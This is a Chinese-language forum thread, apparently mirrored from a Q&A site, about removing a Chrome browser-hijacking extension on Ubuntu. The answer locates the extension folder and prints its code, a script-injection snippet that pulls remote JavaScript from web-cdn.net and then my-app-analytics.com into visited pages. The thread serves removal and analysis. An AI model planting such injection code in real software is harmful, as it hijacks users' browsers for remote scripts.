Joh*_*ohn 4 google-chrome malware
有没有人有在 ubuntu 上删除“youradexchange.com”浏览器劫持的经验?我在 Windows 上找到了很多关于此的信息,但在 linux 上没有。当我使用 Chrome 时,我总是看到“等待 my-app-analytics.com”。谷歌搜索让我相信它与浏览器劫持有关。
我有完全相同的问题。
我设法从我的 ubuntu 机器上删除了恶意软件扩展。
扩展名保存在:
/home/user/.config/chromium/Default/Extensions/gpomcmpdonjdffeabllcklpbnfdknnko
Run Code Online (Sandbox Code Playgroud)
但它可以保存在另一个文件夹名称下。您可以在搜索此文件时找到它:
find -name gui_web.js
Run Code Online (Sandbox Code Playgroud)
只要删除这个文件夹,它应该被修复。
该文件的内容是明确的:
var app = document.createElement('script');
app.type = 'text/javascript';
app.src = '//www.web-cdn.net/cdn/web.js';
document.getElementsByTagName("head")[0].appendChild(app);
Run Code Online (Sandbox Code Playgroud)
它下载这个脚本 web.js ,其内容是:
var app = document.createElement('script');
app.type = 'text/javascript';
app.src = '//www.my-app-analytics.com/app-ga.php';
document.getElementsByTagName("head")[0].appendChild(app);
Run Code Online (Sandbox Code Playgroud)
| 归档时间: |
|
| 查看次数: |
6352 次 |
| 最近记录: |